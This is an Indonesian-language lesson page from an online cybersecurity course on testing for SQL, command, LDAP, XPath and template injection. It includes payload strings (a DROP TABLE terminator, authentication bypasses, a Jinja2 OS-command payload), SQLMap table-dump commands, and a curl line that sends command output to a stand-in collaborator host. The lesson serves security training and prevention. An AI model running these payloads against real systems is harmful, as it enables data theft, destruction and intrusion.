Menguji Kerentanan Injeksi
Gunakan SQLMap, muatan manual, dan Burp untuk menguji injeksi SQL, perintah, dan LDAP.
Menguji Kerentanan Injeksi adalah pelajaran Cyber Security Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Cyber Security Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Kelas Kerentanan Injeksi
Injeksi terjadi ketika data yang tidak tepercaya dikirim ke interpreter sebagai bagian dari perintah atau kueri. Interpreter tidak dapat membedakan data dari perintah sehingga menjalankan logika yang dikendalikan penyerang. Injeksi SQL, perintah, LDAP, XPath, dan templat semuanya termasuk dalam kelas ini.
Injeksi SQL: Pengujian Manual
Mulailah dengan muatan sederhana untuk memeriksa adanya injeksi SQL. Tanda kutip tunggal menyebabkan galat sintaks SQL pada aplikasi yang rentan. Periksa pesan galat, perbedaan panjang respons, dan waktu respons.
# Test for SQLi:
' -- basic quote
'' -- doubled quote
1' OR '1'='1 -- always-true
1; DROP TABLE users -- statement terminator
# In URL:
https://target.com/item?id=1'SQLMap untuk SQLi Otomatis
SQLMap mengotomatiskan pendeteksian dan eksploitasi injeksi SQL: menemukan titik injeksi, mengidentifikasi DBMS, serta dapat mengekspor isi basis data, membaca berkas, dan mencapai eksekusi kode OS pada sistem yang rentan.
# Basic scan
sqlmap -u 'http://target.com/item?id=1'
# With Burp request file
sqlmap -r request.txt
# Dump databases
sqlmap -u 'http://target.com/item?id=1' --dbs
# Dump a table
sqlmap -u '...' -D mydb -T users --dumpPengujian Injeksi Perintah
Injeksi perintah terjadi ketika masukan pengguna diteruskan ke fungsi shell OS. Uji dengan metakarakter shell: titik koma, pipa, tanda kutip terbalik, dan substitusi perintah $().
# Test inputs (form fields, URLs, headers):
; id
| id
`id`
$(id)
&& id
# Blind (no output): use time delays
; sleep 5
| ping -c 5 127.0.0.1
# Or out-of-band:
; curl http://collaborator.example.com/$(id)Injeksi LDAP
Injeksi LDAP memanipulasi kueri LDAP yang digunakan untuk autentikasi dan pencarian direktori. Uji bidang autentikasi dengan: *)(uid=*))(|(uid=* untuk melewati penyaring.
Injeksi XPath
Injeksi XPath menargetkan sistem autentikasi berbasis XML. Mirip dengan SQLi—muatan memanipulasi kueri XPath: ' or '1'='1 untuk melewati autentikasi.
Injeksi Templat (SSTI)
Injeksi Templat Sisi Server terjadi ketika masukan pengguna dirender dalam mesin templat (Jinja2, Twig, Freemarker). Untuk mendeteksinya, sisipkan {{7*7}}—jika respons menampilkan 49, berarti terdapat SSTI.
# Detection payloads:
{{7*7}} # Jinja2, Twig
${7*7} # Freemarker, EL
<%= 7*7 %> # ERB (Ruby)
# RCE via Jinja2:
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}Menggunakan Burp untuk Pengujian Injeksi
Kirim permintaan ke Pemutar Ulang dan sisipkan muatan secara manual ke setiap parameter. Gunakan Penyusup untuk mengotomatiskan pengaburan dengan daftar kata injeksi (SecLists memiliki muatan injeksi yang sangat baik).
# SecLists injection wordlists:
/usr/share/seclists/Fuzzing/SQLi/
/usr/share/seclists/Fuzzing/SSTI/
/usr/share/seclists/Fuzzing/command-injection*Pendeteksian Injeksi Buta
Jika tidak ada keluaran yang terlihat, gunakan: penundaan waktu untuk mengonfirmasi eksekusi, callback DNS OOB (Burp Kolaborator atau interactsh), dan respons berbasis boolean (perubahan panjang konten).
Membaca Pesan Galat Aplikasi
Galat terperinci mengungkapkan jenis basis data, struktur kueri, dan jalur berkas—sangat berharga untuk menyusun muatan yang tepat. Selalu uji dengan masukan debug atau masukan yang mengungkap galat, selain muatan normal.
Referensi Pencegahan
Injeksi dicegah dengan: kueri berparameter (SQLi), validasi masukan dan pelolosan shell (injeksi perintah), serta menghindari perenderan templat terhadap masukan pengguna (SSTI). Pengembang harus memahami hal ini untuk menulis kode yang aman.
Pemeriksaan Singkat
Apa yang dikonfirmasi oleh muatan pendeteksian SSTI {{7*7}} ketika respons menampilkan 49?
Ringkasan: Pengujian Injeksi
Kerentanan injeksi disebabkan oleh pencampuran data dan perintah. Uji setiap masukan yang dikendalikan pengguna dengan muatan injeksi SQL, perintah, templat, dan LDAP. Gunakan SQLMap untuk injeksi SQL otomatis, Pemutar Ulang Burp untuk pengujian manual, serta teknik penundaan waktu/OOB untuk eksploitasi buta. Selalu dokumentasikan muatan dan bukti untuk laporan.
Pertanyaan yang Sering Diajukan
Apakah pelajaran “Menguji Kerentanan Injeksi” gratis?
Ya — teks lengkap “Menguji Kerentanan Injeksi” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Cyber Security Academy, upgrade ke CoddyKit PRO. Kursus Cyber Security Academy mencakup 4 pelajaran total.
Apa yang akan aku pelajari di “Menguji Kerentanan Injeksi”?
Gunakan SQLMap, muatan manual, dan Burp untuk menguji injeksi SQL, perintah, dan LDAP. Kamu berlatih Cyber Security Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.
Apakah aku perlu pengalaman untuk memulai Cyber Security Academy?
Tidak diperlukan pengalaman sebelumnya. Cyber Security Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.
Berapa lama pelajaran “Menguji Kerentanan Injeksi” memakan waktu?
Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.
Bisakah aku menulis dan menjalankan kode dalam pelajaran Cyber Security Academy ini?
Ya. Setiap pelajaran Cyber Security Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.
Semua pelajaran dalam kursus ini
- Proksi Burp Suite dan Pencegatan Permintaan
- Menguji Kerentanan Injeksi
- Pengujian Autentikasi dan Sesi
- Kerentanan Unggah File dan SSRF